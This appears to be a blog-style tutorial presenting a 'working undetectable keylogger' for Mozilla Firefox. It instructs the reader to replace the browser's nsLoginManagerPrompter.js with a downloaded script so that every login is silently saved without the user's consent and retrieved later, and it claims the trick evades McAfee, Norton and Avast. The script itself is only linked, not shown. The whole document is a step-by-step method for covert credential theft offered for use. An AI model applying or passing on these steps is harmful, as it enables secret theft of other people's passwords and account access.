Do you want create your own working undectable keylogger and without any programming knowledge.The keylogger can store all the usernames and passwords of mozilla firefox without the user’s consent.
How this Keylogger Works?
Whenever you login into any website using mozilla firefox browser it always ask’s you whether you want to Save password or not for that website.
We will be using a script that will not give the user option to save the password instead it will automatically save the passwords without user’s consent and we will retrieve them later.
Can this be detected by antivirus?
undetectable in Mcafee,Norton and Avast.
Does It work on all websites?
Almost in All but Not in Gmail.
How to Setup
Now I will give you the step by step tutorial on how to use this trick
- Download this script here
- Now go to the following address
If you are Windows user then goto
C:/Program Files/Mozilla Firefox/Components
If you are MAC user then goto
Applications > Right click Firefox > Show Package Contents >Contents/MacOS/Components
- Now find a file nsLoginManagerPrompter.js and copy it to somewhere safe location because we will be replacing this file in next step.
- Extract the script folder that you have downloaded in first step and copy and paste thensLoginManagerPrompter.js from the folder to the folder mentioned in step 2.
- So now your firefox keylogger is ready.Now Each and every username and password will be automatically saved.
- The next step is to retrieve the username and passwords that have been stored in your firefox browser.